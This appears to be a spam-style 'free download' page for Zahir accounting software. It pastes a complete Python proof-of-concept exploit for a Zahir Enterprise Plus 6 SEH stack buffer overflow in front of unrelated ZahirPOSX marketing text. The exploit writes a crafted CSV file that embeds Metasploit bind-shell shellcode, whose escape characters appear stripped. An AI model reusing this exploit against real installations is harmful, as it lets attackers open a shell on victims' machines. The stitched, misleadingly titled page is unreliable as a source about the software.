Free download zahir accounting software full version

# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) # Google Dork: - # Date: 2018-09-28 # Exploit Author: modpr0be # Vendor Homepage: http://www.zahiraccounting.com/ # Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip # Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip # Tested on: Windows 7 x86/64bit # CVE : N/A # Category: local & privilege escalation # # Description # Vulnerability occurs when the Zahir cannot handle large inputs and anomalies crafted CSV file. # The Zahir main program failed to process the CR LF (Carriage Return Line Feed) characters which # caused the Zahir main program to crash. # # Credits to f3ci, who found the vulnerability. # # Proof of Concept #!/usr/bin/python import struct # msfvenom -p windows/shell_bind_tcp -a x86 -b 'x00x0ax0dx22x2c'  # -n 20 -e x86/shikata_ga_nai -f python -v sc # we won't worry about the space, it's big enough! # badchars are 00,0a,0d,22,2c sc = "" sc += "x92x91xf5x99x98xf5xd6x48x48x3fx2fx99x4a" sc += "x42x9fx2fx42x43x43x42xb8x8cxa3xb1xa0xdd" sc += "xc0xd9x74x24xf4x5bx31xc9xb1x53x31x43x12" sc += "x83xc3x04x03xcfxadx53x55x33x59x11x96xcb" sc += "x9ax76x1ex2exabxb6x44x3bx9cx06x0ex69x11" sc += "xecx42x99xa2x80x4axaex03x2exadx81x94x03" sc += "x8dx80x16x5exc2x62x26x91x17x63x6fxccxda" sc += "x31x38x9ax49xa5x4dxd6x51x4ex1dxf6xd1xb3" sc += "xd6xf9xf0x62x6cxa0xd2x85xa1xd8x5ax9dxa6" sc += "xe5x15x16x1cx91xa7xfex6cx5ax0bx3fx41xa9" sc += "x55x78x66x52x20x70x94xefx33x47xe6x2bxb1" sc += "x53x40xbfx61xbfx70x6cxf7x34x7exd9x73x12" sc += "x63xdcx50x29x9fx55x57xfdx29x2dx7cxd9x72" sc += "xf5x1dx78xdfx58x21x9ax80x05x87xd1x2dx51" sc += "xbaxb8x39x96xf7x42xbaxb0x80x31x88x1fx3b" sc += "xddxa0xe8xe5x1axc6xc2x52xb4x39xedxa2x9d" sc += "xfdxb9xf2xb5xd4xc1x98x45xd8x17x34x4dx7f" sc += "xc8x2bxb0x3fxb8xebx1axa8xd2xe3x45xc8xdc" sc += "x29xeex61x21xd2x01x2exacx34x4bxdexf8xef" sc += "xe3x1cxdfx27x94x5fx35x10x32x17x5fxa7x3d" sc += "xa8x75x8fxa9x23x9ax0bxc8x33xb7x3bx9dxa4" sc += "x4dxaaxecx55x51xe7x86xf6xc0x6cx56x70xf9" sc += "x3ax01xd5xcfx32xc7xcbx76xedxf5x11xeexd6" sc += "xbdxcdxd3xd9x3cx83x68xfex2ex5dx70xbax1a" sc += "x31x27x14xf4xf7x91xd6xaexa1x4exb1x26x37" sc += "xbdx02x30x38xe8xf4xdcx89x45x41xe3x26x02" sc += "x45x9cx5axb2xaax77xdfxc2xe0xd5x76x4bxad" sc += "x8cxcax16x4ex7bx08x2fxcdx89xf1xd4xcdxf8" sc += "xf4x91x49x11x85x8ax3fx15x3axaax15" junk = "A" * 3041 junk += 'nr' junk += 'A' * 380 junk += "xebx08x90x90" # nseh junk += struct.pack('<L',0x52016661) #seh pop ecx # pop ebp # ret 0x04 (C:Program FilesZahir Personal 6 - Demo Versionvclie100.bpl) junk += 'x90x90x90x90' junk += sc junk += "D" * (5000-len(junk)) print """ #===============================================================================# | ____ __ | | / __/__ ___ ___ / /____ _______ _ | | _ / _ / -_) _ / __/ -_) __/ _ `/ | | /___/ .__/__/_//_/__/__/_/ _,_/ | | /_/ | | | | Zahir Enterprise Plus 6 <= build 10b Stack Overflow Vulnerability (0day) | | CVE-2018-17408 | | by modpr0be & f3ci (research[at]spentera.com) | #===============================================================================# """ print "[+] Preparing for file.." f = open('exploit.csv', 'w') print "[+] Writing exploit code on a CSV file.." f.write(junk) f.close() print "[+] Success writing file.. bring to Mr. Zahir." 

ZahirPOSX is a sales automation system (Known as Point of Sales or cashier system) that is here to help you to manage your business easily and grow faster.
ZahirPOSX is not just a basic application, we provide all range of solutions for your business on your hand.
Our Interactive and user-friendly design make everyone can use it as easy as updating a new status in social media.

Warning

High use of ZahirPOSX boosts the growth of your business faster than your expectation !

Features

1. Multiple Outlet
2. Simple transaction flow
3. Multi payment system
4. Save order
5. Send to multiple printer
6. Online and Offline Transaction options
7. Share receipt to social media.

Other Benefits
ZahirPOSX is supported by a strong ecosystem in the business which been proven for over 22 years.
More than 1500 support teams ready to help you across 5 countries and over 40 cities around Indonesia.
Strong business community network available to help and share their experiences sincerely
More than 40k Zahir certified users from the millennial generation and ready to be part of your team.
All of the above are possible because of the backup and is being part of zahir.co.id, a successful company which have been around for over 22 years and is a market leader in accounting software industry that today have transform itself to be the number 1 application developer for businesses in Indonesia.

Written by Jane